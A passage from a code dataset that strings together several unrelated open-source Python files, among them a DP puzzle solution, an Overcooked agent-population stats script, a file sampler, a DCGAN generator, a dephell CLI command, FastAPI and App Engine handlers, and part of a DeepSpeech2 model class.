perim, inter = contours\n m = np.zeros(img_size, np.uint8)\n\n if not perim:\n return m\n\n cv2.fillPoly(m, perim, class_id)\n cv2.fillPoly(m, inter, 0)\n return m\n","repo_name":"krisrs1128/map_labels","sub_path":"src/raster.py","file_name":"raster.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2344250018","text":"import sys\n\nn = int(sys.stdin.readline())\n\ndp = [[0, 0, 0] for _ in range(n + 1)]\ndp[1][0], dp[1][1], dp[1][2] = 1, 1, 1 # n = 1일 때, 3가지 경우의 수\n\n# 점화식 : n번째 우리의 사자가 없는 경우와 왼쪽에 있을 경우와 오른쪽의 있을 경우로 나눠서 수행\nfor i in range(2, n + 1):\n dp[i][0] = (dp[i - 1][0] + dp[i - 1][1] + dp[i - 1][2]) % 9901 # 없을 경우\n dp[i][1] = (dp[i - 1][0] + dp[i - 1][2]) % 9901 # 왼쪽에 있을 경우\n dp[i][2] = (dp[i - 1][0] + dp[i - 1][1]) % 9901 # 오른쪽에 있을 경우\n\nprint(sum(dp[n]) % 9901) # n번째 우리의 사자를 배치하는 경우의 수의 합을 출력\n","repo_name":"junjange/CodingTest","sub_path":"baekjoon/Dynamic_Programming/1309.py","file_name":"1309.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2787427523","text":"\nfrom overcooked_ai_py.agents.agent import AgentPair\nfrom overcooked_ai_py.mdp.overcooked_mdp import OvercookedGridworld\nfrom overcooked_ai_py.mdp.overcooked_env import OvercookedEnv\nimport copy\nimport numpy as np\nfrom overcooked_ai_py.planning.planners import MediumLevelPlanner\nfrom human_aware_rl.ppo.ppo_pop import make_tom_agent\nfrom human_ai_robustness.import_person_params import import_manual_tom_params\nfrom argparse import ArgumentParser\nimport matplotlib.pyplot as plt\nfrom human.process_dataframes import get_human_human_trajectories\n\nno_counters_params = {\n 'start_orientations': False,\n 'wait_allowed': False,\n 'counter_goals': [],\n 'counter_drop': [],\n 'counter_pickup': [],\n 'same_motion_goals': True\n}\n\ndef make_tom_pop(prob_pausing_factor):\n \"\"\"Make a population of TOMs\n params: ?\"\"\"\n\n ALL_TOM_PARAMS = []\n # Agents with a fixed \"personality type\":\n for prob_greedy in range(2):\n for prob_obs_other in range(2):\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4, 'PROB_THINKING_NOT_MOVING_TOM': 0,\n 'COMPLIANCE_TOM': 0.9, 'PATH_TEAMWORK_TOM': 0.9, 'RAT_COEFF_TOM': 10,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.7})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0.8, 'LOOK_AHEAD_STEPS_TOM': 4,\n 'PROB_THINKING_NOT_MOVING_TOM': 0,\n 'COMPLIANCE_TOM': 0.1, 'PATH_TEAMWORK_TOM': 0.1, 'RAT_COEFF_TOM': 2,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.5})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4, 'PROB_THINKING_NOT_MOVING_TOM': 0,\n 'COMPLIANCE_TOM': 0.9, 'PATH_TEAMWORK_TOM': 0.1, 'RAT_COEFF_TOM': 0.5,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.4})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4,\n 'PROB_THINKING_NOT_MOVING_TOM': 0.4,\n 'COMPLIANCE_TOM': 0.5, 'PATH_TEAMWORK_TOM': 0.5, 'RAT_COEFF_TOM': 10,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.6})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4,\n 'PROB_THINKING_NOT_MOVING_TOM': 0.2,\n 'COMPLIANCE_TOM': 0.1, 'PATH_TEAMWORK_TOM': 0.1, 'RAT_COEFF_TOM': 5,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.4})\n\n # Agents that fluctuate between different types\n values = [[0.7, 0.3], [0.3, 0.7]]\n for i in range(len(values)):\n prob_greedy, prob_obs_other = values[i]\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4, 'PROB_THINKING_NOT_MOVING_TOM': 0,\n 'COMPLIANCE_TOM': 0.9, 'PATH_TEAMWORK_TOM': 0.9, 'RAT_COEFF_TOM': 10,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.7})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0.8, 'LOOK_AHEAD_STEPS_TOM': 4, 'PROB_THINKING_NOT_MOVING_TOM': 0,\n 'COMPLIANCE_TOM': 0.1, 'PATH_TEAMWORK_TOM': 0.1, 'RAT_COEFF_TOM': 2,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.5})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4, 'PROB_THINKING_NOT_MOVING_TOM': 0,\n 'COMPLIANCE_TOM': 0.9, 'PATH_TEAMWORK_TOM': 0.1, 'RAT_COEFF_TOM': 0.5,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.4})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4, 'PROB_THINKING_NOT_MOVING_TOM': 0.4,\n 'COMPLIANCE_TOM': 0.5, 'PATH_TEAMWORK_TOM': 0.5, 'RAT_COEFF_TOM': 10,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.6})\n ALL_TOM_PARAMS.append({'PROB_GREEDY_TOM': prob_greedy, 'PROB_OBS_OTHER_TOM': prob_obs_other,\n 'RETAIN_GOALS_TOM': 0, 'LOOK_AHEAD_STEPS_TOM': 4, 'PROB_THINKING_NOT_MOVING_TOM': 0.2,\n 'COMPLIANCE_TOM': 0.1, 'PATH_TEAMWORK_TOM': 0.1, 'RAT_COEFF_TOM': 5,\n 'PROB_PAUSING_TOM': prob_pausing_factor*0.4})\n\n return ALL_TOM_PARAMS\n\ndef get_stats(scores):\n \"\"\"Get stats such as mean, median, range, SD\"\"\"\n stats_dict = {}\n stats_dict['median'] = np.median(scores)\n stats_dict['mean'] = np.mean(scores)\n stats_dict['std'] = np.std(scores)\n print('\\nSCORE STATS: ', stats_dict, '\\n')\n return stats_dict\n\ndef plot_scores_dist(scores, title):\n \"\"\"Plot the distribution of the scores\"\"\"\n colours = ['b', 'r', 'y', 'c', 'm', 'g']\n f, ax = plt.subplots(1, 1, sharex='col', sharey='row')\n x_axis = [i for i in range(len(scores))]\n ax.bar(x_axis, np.sort(scores), 0.4, alpha=0.4, color=colours)\n ax.title.set_text(title)\n ax.set_ylabel('score')\n ax.set_xlim(0, len(x_axis))\n ax.grid()\n plt.tight_layout()\n plt.show()\n\ndef get_human_human_data_scores(layouts):\n \"\"\"Load human human data, for layouts, for both train and test.\"\"\"\n\n expert_data = []\n expert_data.append(get_human_human_trajectories(layouts, 'train'))\n expert_data.append(get_human_human_trajectories(layouts, 'test'))\n\n # Combine ALL the ep_returns into a single vector, \"scores\":\n scores = []\n for layout in layouts:\n for i in range(2):\n for j in range(len(expert_data[i][layout]['ep_lengths'])):\n # Check the ep_lengths are 1200 \\pm 100.\"\"\"\n assert 1100 < expert_data[i][layout]['ep_lengths'][j] < 1300, \"Data trajectories have unexpected length!\"\n scores.append(expert_data[i][layout]['ep_returns'][j])\n return scores\n\nif __name__ == \"__main__\":\n \"\"\"Create a pop of (30?) TOMs, then play each TOM with itself on each layout. Then print a bunch of stats about the \n performance of the TOMs, e.g. median score, mean score, range, SD. And plot the scores.\"\"\"\n\n parser = ArgumentParser()\n parser.add_argument(\"-a\", \"--num_avg\",\n help=\"number of rollouts to avg over\", required=False, default=1, type=int)\n parser.add_argument(\"-t\", \"--testing\",\n help=\"whether we're testing or not\", required=False, default=\"False\")\n parser.add_argument(\"-hd\", \"--hh_data\",\n help=\"Get stats for human-human data, instead of generating TOM data\",\n required=False, default=\"False\")\n parser.add_argument(\"-hz\", \"--horizon\", help=\"Game horizon\", required=False, default=1200, type=int)\n parser.add_argument(\"-l\", \"--layout\", help=\"e.g. 'cramped_room' or 'all'\", required=False, default='all')\n parser.add_argument(\"-pf\", \"--prob_pausing_factor\", help=\"Factor to adjust the param prob_pausing by. E.g. if 0.5 then \"\n \"all prob_pausing values will be half of the default value (which is in import_person_params)\", required=False, default=1, type=float)\n\n args = parser.parse_args()\n num_avg, testing, hh_data, horizon, prob_pausing_factor, layout \\\n = args.num_avg, args.testing, args.hh_data, args.horizon, args.prob_pausing_factor, args.layout\n\n layouts = ['cramped_room', 'asymmetric_advantages', 'coordination_ring', 'counter_circuit'] \\\n if layout is 'all' else [layout]\n\n if not hh_data == \"True\":\n # Generate TOM data then get stats on the performance\n\n # Make the TOM params:\n ALL_TOM_PARAMS = make_tom_pop(prob_pausing_factor)\n\n # Stuff that can be done outside the loop:\n cook_time = 20\n start_order_list = 100 * ['any']\n\n scores = []\n\n # Loop over layouts:\n for layout_name in layouts:\n\n print('Layout: {}'.format(layout_name))\n\n mdp = OvercookedGridworld.from_layout_name(layout_name, start_order_list=start_order_list,\n cook_time=cook_time, rew_shaping_params=None)\n no_counters_params['counter_drop'] = mdp.get_counter_locations()\n no_counters_params['counter_goals'] = mdp.get_counter_locations()\n mlp = MediumLevelPlanner.from_pickle_or_compute(mdp, no_counters_params, force_compute=False)\n env = OvercookedEnv(mdp, horizon=horizon)\n\n # Make the TOM pop for this mlp:\n tom_pop = []\n for this_tom_params in ALL_TOM_PARAMS:\n tom_pair = []\n for i in range(2):\n tom_agent = make_tom_agent(mlp)\n tom_agent.set_tom_params(None, None, [this_tom_params], tom_params_choice=0)\n tom_pair.append(tom_agent)\n tom_pop.append(tom_pair)\n num_toms = len(ALL_TOM_PARAMS) if testing != \"True\" else 2\n\n # Find score for each TOM:\n for i in range(num_toms):\n agent_pair = AgentPair(tom_pop[i][0], tom_pop[i][1])\n trajs = env.get_rollouts(agent_pair, num_games=num_avg, final_state=False, display=False)\n sparse_rews = trajs[\"ep_returns\"]\n avg_sparse_rew = np.mean(sparse_rews)\n if avg_sparse_rew < 150:\n print(\"Poor score on {}: {}\\n{}\".format(layout_name, avg_sparse_rew, ALL_TOM_PARAMS[i]))\n scores.append(avg_sparse_rew)\n print('\\n\\n\\nScore this TOM: {}\\n\\n\\n'.format(avg_sparse_rew))\n title = \"TOM pop sp scores over all layouts\"\n\n elif hh_data == \"True\":\n # Get human-human data\n scores = get_human_human_data_scores(layouts)\n title = \"H+H data scores over all layouts\"\n\n else:\n raise ValueError\n\n stats_dict = get_stats(scores)\n plot_scores_dist(scores, title)\n","repo_name":"HumanCompatibleAI/human_ai_robustness","sub_path":"human_ai_robustness/analyse_optimise_agents/tom_pop_stats_SP.py","file_name":"tom_pop_stats_SP.py","file_ext":"py","file_size_in_byte":10793,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"33472147294","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/python\n#\n# See:\n# \t\thttps://docs.python.org/3.5/library/filesys.html\n# \t\thttps://docs.python.org/3.5/library/shutil.html\n#\n\nimport os\nimport argparse\nfrom pathlib import Path\nimport random\n\nclass FileSamplerException(Exception):\n\tpass\n\nclass Sampler(object):\n\n\tdef __init__(self, input, output, sampleSize, writeFileList=False):\n\t\tself.input = input\n\t\tself.output = output\n\t\tself.sampleSize = sampleSize\n\t\tself.writeFileList = writeFileList\n\n\tdef fileList(self):\n\t\tcurrentPath = Path(self.input)\n\t\tl = [pathitem.name for pathitem in currentPath.iterdir() if not(pathitem.is_dir())]\n\t\treturn l\n\n\tdef sample(self):\n\t\tl = self.fileList()\n\t\tsample = random.sample(l, self.sampleSize)\n\t\tif self.writeFileList:\n\t\t\tf = open(self.output+os.sep+\"sampleList.txt\", 'w')\n\t\t\tfolder = self.input+os.sep\n\t\t\tfor item in sample:\n \t\t\t\tf.write(\"%s%s\\n\" % (folder, item))\n\t\t\tf.close()\n\t\treturn sample\n\n\tdef validate(self):\n\t\ttry:\n\t\t self.checkValidSampleSize()\n\t\texcept (FileSamplerException):\n\t\t print(\"Invalid size of sample.\")\n\t\texcept:\n\t\t print(\"An unexpected error occurred\")\n\t\t raise\n\n\t\treturn True\n\n\tdef checkValidSampleSize(self):\n\t\tfileList = self.fileList()\n\t\tif len(fileList) <= self.sampleSize:\n\t\t\traise FileSamplerException(\"Invalid sample size.\")\n\n\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"inputFolder\", help=\"The input folder to where extract the samples\")\n\tparser.add_argument(\"outputFolder\", help=\"The output folder to place the sampled files\")\n\tparser.add_argument(\"sampleSize\", help=\"Size of the sample to consider\", type=int)\n\tparser.add_argument(\"--writeFileList\", help=\"Whether to sample the files or just return a file with the list of files\", type=int, nargs='?')\n\targs = parser.parse_args()\n\n\tsampler = Sampler(args.inputFolder, args.outputFolder, args.sampleSize, args.writeFileList)\n\tsampler.sample()\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()\n","repo_name":"juan88/filesampler","sub_path":"filesampler.py","file_name":"filesampler.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35738991399","text":"from math import log2\n\nimport torch\nimport torch.nn as nn\nfrom common.base_module import BaseModule\nfrom settings import settings\n\n\ndef _init_weights(m):\n if type(m) == nn.ConvTranspose2d:\n torch.nn.init.xavier_normal(m.weight, gain=2)\n if type(m) == nn.BatchNorm2d:\n torch.nn.init.uniform_(m.weight, -1, 1)\n\n\nclass Generator(BaseModule):\n def __init__(self, input_vector_size: int = 100, output_size: tuple = (64, 64, 3), feature_maps: int = 64, **_):\n super(Generator, self).__init__()\n self.input_vector_size = input_vector_size\n self.output_size = output_size\n self.feature_maps = feature_maps\n self.num_conv_layers = int(log2(output_size[0] / 4) - 1) # -1 perché poi aggiungo il layer finale\n\n self.conv_list = []\n self.conv_list.append(\n nn.ConvTranspose2d(input_vector_size, feature_maps * 2 ** self.num_conv_layers, 4, 1, 0, bias=False))\n self.conv_list.append(nn.BatchNorm2d(feature_maps * 2 ** self.num_conv_layers))\n self.conv_list.append(nn.LeakyReLU(inplace=True, negative_slope=0.2))\n # state size is (feature_maps * 2 ** num_conv_layers) x 4 x 4\n\n for i in range(1, self.num_conv_layers + 1):\n self.conv_list.append(nn.ConvTranspose2d(feature_maps * 2 ** (self.num_conv_layers - i + 1),\n feature_maps * 2 ** (self.num_conv_layers - i),\n 4, 2, 1, bias=False))\n self.conv_list.append(nn.BatchNorm2d(feature_maps * 2 ** (self.num_conv_layers - i)))\n self.conv_list.append(nn.LeakyReLU(inplace=True, negative_slope=0.2))\n # state size is (feature_maps * 2^(num_conv_layers - i)) x (4 x 2^i) x (4 x 2^i)\n\n # state size is (feature_maps) x (output_size[0] / 2) x (output_size[0] / 2)\n self.conv_list.append(nn.ConvTranspose2d(feature_maps, output_size[2], 4, 2, 1, bias=False))\n self.conv_list.append(nn.Tanh())\n self.conv_layer = nn.Sequential(*self.conv_list)\n\n def forward(self, x):\n return self.conv_layer(x)\n\n def init_weights(self):\n self.apply(_init_weights)\n\n def set_preprocessing_params(self, params):\n params['mean'] = [0.5]\n params['std'] = [0.5]\n return params\n\n def get_weights_filename(self):\n return f'dcgan_generator_isz{self.input_vector_size}_osz{self.output_size[0]}_fm{self.feature_maps}' \\\n f'_v{settings.dcgan_model_version}.pt'\n","repo_name":"Daniangio/model_training","sub_path":"projects/dcgan/modules/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16863589581","text":"# built-in\nfrom argparse import ArgumentParser\nfrom pathlib import Path\n\n# external\nfrom dephell_venvs import VEnvs\nfrom packaging.utils import canonicalize_name\n\n# app\nfrom ..actions import format_size, get_path_size, make_json\nfrom ..config import builders\nfrom ..converters import InstalledConverter\nfrom .base import BaseCommand\n\n\nclass JailShowCommand(BaseCommand):\n \"\"\"Show info about the package isolated environment.\n \"\"\"\n find_config = False\n\n @staticmethod\n def build_parser(parser) -> ArgumentParser:\n builders.build_config(parser)\n builders.build_venv(parser)\n builders.build_output(parser)\n builders.build_other(parser)\n parser.add_argument('name', help='jail name')\n return parser\n\n def __call__(self) -> bool:\n venvs = VEnvs(path=self.config['venv'])\n name = canonicalize_name(self.args.name)\n venv = venvs.get_by_name(name)\n if not venv.exists():\n self.logger.error('jail does not exist', extra=dict(package=name))\n return False\n\n # get list of exposed entrypoints\n entrypoints_names = []\n for entrypoint in venv.bin_path.iterdir():\n global_entrypoint = Path(self.config['bin']) / entrypoint.name\n if not global_entrypoint.exists():\n continue\n if not global_entrypoint.resolve().samefile(entrypoint):\n continue\n entrypoints_names.append(entrypoint.name)\n\n root = InstalledConverter().load(paths=[venv.lib_path], names={name})\n version = None\n for subdep in root.dependencies:\n if subdep.name != name:\n continue\n version = str(subdep.constraint).replace('=', '')\n\n data = dict(\n name=name,\n path=str(venv.path),\n entrypoints=entrypoints_names,\n version=version,\n size=dict(\n lib=format_size(get_path_size(venv.lib_path)),\n total=format_size(get_path_size(venv.path)),\n ),\n )\n\n print(make_json(\n data=data,\n key=self.config.get('filter'),\n colors=not self.config['nocolors'],\n table=self.config['table'],\n ))\n return True\n","repo_name":"dephell/dephell","sub_path":"dephell/commands/jail_show.py","file_name":"jail_show.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":1758,"dataset":"github-code","pt":"48"} +{"seq_id":"23222475267","text":"from fastapi import HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom .. import models, schemas\n\n\ndef get_all(db: Session):\n ingredientes = db.query(models.Ingrediente).order_by(models.Ingrediente.nombre_ingrediente).all()\n return ingredientes\n\n\ndef create(request: schemas.Ingrediente, db: Session):\n new_ingrediente = models.Ingrediente(nombre_ingrediente=request.nombre_ingrediente,\n cantidad_calorias=request.cantidad_calorias,\n id_categoria=request.id_categoria)\n db.add(new_ingrediente)\n db.commit()\n db.refresh(new_ingrediente)\n return new_ingrediente\n\n\ndef show(id: int, db: Session):\n ingrediente = db.query(models.Ingrediente).filter(models.Ingrediente.id_ingrediente == id).first()\n if not ingrediente:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"El ingrediente con id {id} no existe\")\n return ingrediente\n","repo_name":"Nutricionapp/api","sub_path":"NutricionApp/repository/ingrediente.py","file_name":"ingrediente.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28053881977","text":"from datetime import datetime\r\nfrom google.appengine.ext import webapp\r\nfrom google.appengine.ext.webapp import template\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.api import users\r\nfrom sintjan.business.settings import RequestContext\r\nfrom sintjan.business.model import Page, BlockLink\r\nfrom sintjan.controllers import util\r\nimport sintjan.business\r\n\r\n\r\nclass EditPage(webapp.RequestHandler):\r\n def get(self):\r\n if util.checkAuth(self, False):\r\n page = self.getPageItem(self.request)\r\n\r\n values = {\r\n 'context':RequestContext(),\r\n 'page': page,\r\n 'blockLeft': self.getBlockLinkByRegion('left', page),\r\n 'blockFooter': self.getBlockLinkByRegion('footer', page)\r\n }\r\n\r\n self.response.out.write(template.render('templates/admin/pageEdit.html', values))\r\n\r\n def post(self):\r\n if util.checkAuth(self, False):\r\n page = self.getPageItem(self.request)\r\n \r\n page.url = self.request.get('url')\r\n page.title = self.request.get('title')\r\n page.content = self.request.get('content')\r\n page.breadcrumb = self.request.get('breadcrumb')\r\n\r\n if len(page.url)>0 and len(page.title)>0:\r\n page.put()\r\n\r\n # Creating the left block\r\n name = self.request.get('blockLeft')\r\n\r\n if len(name)>0:\r\n blockLink = self.getBlockLinkByRegion('left', page)\r\n blockLink.name = self.request.get('blockLeft')\r\n blockLink.put()\r\n\r\n # Creating the footer block\r\n name = self.request.get('blockFooter')\r\n\r\n if len(name)>0:\r\n blockLink = self.getBlockLinkByRegion('footer', page)\r\n blockLink.name = self.request.get('blockFooter')\r\n blockLink.put()\r\n\r\n self.redirect('/admin/page/all?status=ok', permanent=False)\r\n\r\n else:\r\n values = {\r\n 'context':RequestContext(),\r\n 'page':page,\r\n 'blockLeft': self.getBlockLinkByRegion('left', page),\r\n 'blockFooter': self.getBlockLinkByRegion('footer', page),\r\n 'error':True\r\n }\r\n\r\n self.response.out.write(template.render('templates/admin/pageEdit.html',values))\r\n\r\n def getPageItem(self, request):\r\n # POST id\r\n id = sintjan.business.util.parseint(request.get('id'),0)\r\n\r\n #GET id\r\n if id<1:\r\n id = sintjan.business.util.parseint(request.get('pageid'),0)\r\n\r\n if id>0:\r\n page = Page.get_by_id(id)\r\n else:\r\n user = users.get_current_user()\r\n\r\n page = Page()\r\n page.createdOn = datetime.now()\r\n page.createdBy = user.user_id()\r\n page.url = request.get('path')\r\n page.title = \"\"\r\n page.content = \"\"\r\n page.breadcrumb = \"\"\r\n page.visible = True\r\n\r\n if not page.breadcrumb:\r\n page.breadcrumb = \"\"\r\n\r\n return page\r\n\r\n def getBlockLinkByRegion(self, region, page):\r\n query = BlockLink.gql(\"WHERE region = :region AND pageId = :pageId\", region=region, pageId=page.id())\r\n\r\n if query.count()>0:\r\n return query[0]\r\n else:\r\n blockLink = BlockLink()\r\n blockLink.region = region\r\n blockLink.pageId = page.id()\r\n return blockLink\r\n\r\n\r\nclass AllPage(webapp.RequestHandler):\r\n def get(self):\r\n if util.checkAuth(self, False):\r\n items = db.GqlQuery(\"SELECT * FROM Page ORDER BY url ASC LIMIT 100\")\r\n values = {'context':RequestContext(),'list':items, 'request':self.request}\r\n self.response.out.write(template.render('templates/admin/pageAll.html',values))\r\n\r\n\r\n","repo_name":"janvandenbussche/website-sintjan","sub_path":"sintjan/controllers/admin/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5285566022","text":"import sys\nimport os\nimport time\nimport logging\nimport gzip\nimport copy\nimport inspect\nimport collections\nimport multiprocessing\nimport numpy as np\nfrom distutils.dir_util import mkpath\nimport paddle.fluid as fluid\nimport paddle.fluid.compiler as compiler\nfrom decoders.swig_wrapper import Scorer\nfrom decoders.swig_wrapper import ctc_greedy_decoder\nfrom decoders.swig_wrapper import ctc_beam_search_decoder_batch\nfrom model_utils.network import deep_speech_v2_network\n\nlogging.basicConfig(\n format='[%(levelname)s %(asctime)s %(filename)s:%(lineno)d] %(message)s')\n\n\nclass DeepSpeech2Model(object):\n \"\"\"DeepSpeech2Model class.\n\n :param vocab_size: Decoding vocabulary size.\n :type vocab_size: int\n :param num_conv_layers: Number of stacking convolution layers.\n :type num_conv_layers: int\n :param num_rnn_layers: Number of stacking RNN layers.\n :type num_rnn_layers: int\n :param rnn_layer_size: RNN layer size (number of RNN cells).\n :type rnn_layer_size: int\n :param use_gru: Use gru if set True. Use simple rnn if set False.\n :type use_gru: bool\n :param share_rnn_weights: Whether to share input-hidden weights between\n forward and backward directional RNNs.Notice that\n for GRU, weight sharing is not supported.\n :type share_rnn_weights: bool\n :param place: Program running place.\n :type place: CPUPlace or CUDAPlace\n :param init_from_pretrained_model: Pretrained model path. If None, will train\n from stratch.\n :type init_from_pretrained_model: string|None\n :param output_model_dir: Output model directory. If None, output to current directory. \n :type output_model_dir: string|None\n \"\"\"\n\n def __init__(self,\n vocab_size,\n num_conv_layers,\n num_rnn_layers,\n rnn_layer_size,\n use_gru=False,\n share_rnn_weights=True,\n place=fluid.CPUPlace(),\n init_from_pretrained_model=None,\n output_model_dir=None):\n self._vocab_size = vocab_size\n self._num_conv_layers = num_conv_layers\n self._num_rnn_layers = num_rnn_layers\n self._rnn_layer_size = rnn_layer_size\n self._use_gru = use_gru\n self._share_rnn_weights = share_rnn_weights\n self._place = place\n self._init_from_pretrained_model = init_from_pretrained_model\n self._output_model_dir = output_model_dir\n self._ext_scorer = None\n self.logger = logging.getLogger(\"\")\n self.logger.setLevel(level=logging.INFO)\n\n def create_network(self, is_infer=False):\n \"\"\"Create data layers and model network.\n :param is_training: Whether to create a network for training.\n :type is_training: bool \n :return reader: Reader for input.\n :rtype reader: read generater\n :return log_probs: An output unnormalized log probability layer.\n :rtype lig_probs: Varable\n :return loss: A ctc loss layer.\n :rtype loss: Variable\n \"\"\"\n\n if not is_infer:\n input_fields = {\n 'names': ['audio_data', 'text_data', 'seq_len_data', 'masks'],\n 'shapes':\n [[None, 161, None], [None, 1], [None, 1], [None, 32, 81, None]],\n 'dtypes': ['float32', 'int32', 'int64', 'float32'],\n 'lod_levels': [0, 1, 0, 0]\n }\n\n inputs = [\n fluid.data(\n name=input_fields['names'][i],\n shape=input_fields['shapes'][i],\n dtype=input_fields['dtypes'][i],\n lod_level=input_fields['lod_levels'][i])\n for i in range(len(input_fields['names']))\n ]\n\n reader = fluid.io.DataLoader.from_generator(\n feed_list=inputs,\n capacity=64,\n iterable=False,\n use_double_buffer=True)\n\n (audio_data, text_data, seq_len_data, masks) = inputs\n else:\n audio_data = fluid.data(\n name='audio_data',\n shape=[None, 161, None],\n dtype='float32',\n lod_level=0)\n seq_len_data = fluid.data(\n name='seq_len_data',\n shape=[None, 1],\n dtype='int64',\n lod_level=0)\n masks = fluid.data(\n name='masks',\n shape=[None, 32, 81, None],\n dtype='float32',\n lod_level=0)\n text_data = None\n reader = fluid.DataFeeder([audio_data, seq_len_data, masks],\n self._place)\n\n log_probs, loss = deep_speech_v2_network(\n audio_data=audio_data,\n text_data=text_data,\n seq_len_data=seq_len_data,\n masks=masks,\n dict_size=self._vocab_size,\n num_conv_layers=self._num_conv_layers,\n num_rnn_layers=self._num_rnn_layers,\n rnn_size=self._rnn_layer_size,\n use_gru=self._use_gru,\n share_rnn_weights=self._share_rnn_weights)\n return reader, log_probs, loss\n\n def init_from_pretrained_model(self, exe, program):\n '''Init params from pretrain model. '''\n\n assert isinstance(self._init_from_pretrained_model, str)\n\n if not os.path.exists(self._init_from_pretrained_model):\n print(self._init_from_pretrained_model)\n raise Warning(\"The pretrained params do not exist.\")\n return False\n fluid.io.load_params(\n exe,\n self._init_from_pretrained_model,\n main_program=program,\n filename=\"params.pdparams\")\n\n print(\"finish initing model from pretrained params from %s\" %\n (self._init_from_pretrained_model))\n\n pre_epoch = 0\n dir_name = self._init_from_pretrained_model.split('_')\n if len(dir_name) >= 2 and dir_name[-2].endswith('epoch') and dir_name[\n -1].isdigit():\n pre_epoch = int(dir_name[-1])\n\n return pre_epoch + 1\n\n def save_param(self, exe, program, dirname):\n '''Save model params to dirname'''\n\n assert isinstance(self._output_model_dir, str)\n\n param_dir = os.path.join(self._output_model_dir)\n\n if not os.path.exists(param_dir):\n os.mkdir(param_dir)\n\n fluid.io.save_params(\n exe,\n os.path.join(param_dir, dirname),\n main_program=program,\n filename=\"params.pdparams\")\n print(\"save parameters at %s\" % (os.path.join(param_dir, dirname)))\n\n return True\n\n def test(self, exe, dev_batch_reader, test_program, test_reader,\n fetch_list):\n '''Test the model.\n\n :param exe:The executor of program.\n :type exe: Executor\n :param dev_batch_reader: The reader of test dataa.\n :type dev_batch_reader: read generator \n :param test_program: The program of test.\n :type test_program: Program\n :param test_reader: Reader of test.\n :type test_reader: Reader\n :param fetch_list: Fetch list.\n :type fetch_list: list\n :return: An output unnormalized log probability. \n :rtype: array\n '''\n test_reader.start()\n epoch_loss = []\n while True:\n try:\n each_loss = exe.run(\n program=test_program,\n fetch_list=fetch_list,\n return_numpy=False)\n epoch_loss.extend(np.array(each_loss[0]))\n\n except fluid.core.EOFException:\n test_reader.reset()\n break\n return np.mean(np.array(epoch_loss))\n\n def train(self,\n train_batch_reader,\n dev_batch_reader,\n feeding_dict,\n learning_rate,\n gradient_clipping,\n num_epoch,\n batch_size,\n num_samples,\n save_epoch=100,\n num_iterations_print=100,\n test_off=False):\n \"\"\"Train the model.\n\n :param train_batch_reader: Train data reader.\n :type train_batch_reader: callable\n :param dev_batch_reader: Validation data reader.\n :type dev_batch_reader: callable\n :param feeding_dict: Feeding is a map of field name and tuple index\n of the data that reader returns.\n :type feeding_dict: dict|list\n :param learning_rate: Learning rate for ADAM optimizer.\n :type 